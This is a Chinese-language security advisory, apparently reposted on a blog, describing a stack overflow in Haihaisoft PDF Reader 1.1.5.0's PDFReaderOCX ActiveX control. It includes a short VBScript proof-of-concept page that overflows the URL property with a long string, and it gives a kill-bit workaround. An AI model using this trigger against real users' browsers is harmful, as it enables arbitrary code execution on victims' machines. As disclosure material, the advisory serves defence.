海海软件PDF阅读器PDFReaderOCX ActiveX控件栈溢出漏洞

受影响系统:

Haihaisoft PDF Reader 1.1.5.0

描述: shinnai@autistici.org
  
  链接:
http://secunia.com/advisories/40520/
        http://www.shinnai.altervista.org/exploits/SH-001-20100714.html
*>

测试方法:

海海软件PDF阅读器是全球最轻量级的免费阅读器。

海海软件PDF阅读器所安装的PDFReaderOCX ActiveX控件没有正确地验证URL属性参数,用户受骗访问了恶意网页并在文件名中提供了超过2048字节的超长字符串就可以触发栈溢出,导致执行任意代码。

<*来源:shinnai (

<object classid=’clsid:28CB49D6-E530-442B-A182-79F047C3AA1B’ id=’test’></object>

<script language="vbscript">
  buff = "AAAAAAAAAAAAAAABBBB" + String(2011, "C")
  test.URL = buff

  Function tryMe()
   document.location.reload
  End Function

  Sub Window_OnLoad
   setTimeout "tryMe()",2000
  End Sub
</script>

建议:

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

临时解决方法:

* 为clsid: 28CB49D6-E530-442B-A182-79F047C3AA1B设置kill bit。

厂商补丁:

Haihaisoft
———-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.drm-x.com/Haihaisoft-Universal-Player.aspx

发表评论?

0 条评论。

发表评论